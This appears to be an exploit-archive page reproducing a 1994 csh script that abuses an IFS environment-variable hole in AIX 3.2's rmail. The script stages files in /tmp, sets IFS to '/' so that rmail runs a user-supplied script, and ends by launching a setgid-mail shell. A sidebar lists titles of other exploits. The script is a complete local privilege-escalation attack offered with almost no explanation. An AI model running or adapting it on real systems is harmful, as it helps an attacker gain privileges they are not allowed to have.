source: http://www.securityfocus.com/bid/454/info Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. #!/bin/csh # IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994 # Setup needed files. mkdir /tmp/.rmail cd /tmp/.rmail cat << EOF > usr cp sh mailsh chmod 2777 mailsh EOF chmod 777 usr ln -s /bin/sh . # Set PATH, IFS, and run rmail. setenv PATH .:$PATH setenv IFS / echo "cheezy mail hack" | rmail joeuser@nohost.com unsetenv IFS rm -f usr sh # minor cleanup. echo "Attempting to run sgid shell." ./mailsh
anonymous
ProFTPd 1.3.5 - File Copy
WordPress Plugin Relevanssi - 'category_name' SQL Injection
Apache Libcloud Digital Ocean API - Local Information Disclosure
Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service
WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities
MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WP Super Cache - PHP Remote Code Execution
Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities
Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service
Mozilla Firefox - Cookie Verification Denial of Service
Recent Exploits
Mozilla Firefox < 55 - Denial of Service
Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection
Check_MK 1.2.8p25 - Information Disclosure
Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities
Xen - Unbounded Recursion in Pagetable De-typing
Linksys E Series - Multiple Vulnerabilities
TP-Link WR940N - Authenticated Remote Code Exploit
Wordpress Plugin Car Park Booking - SQL Injection
Career Portal 1.0 - SQL Injection
Linux Kernel - 'AF_PACKET' Use-After-Free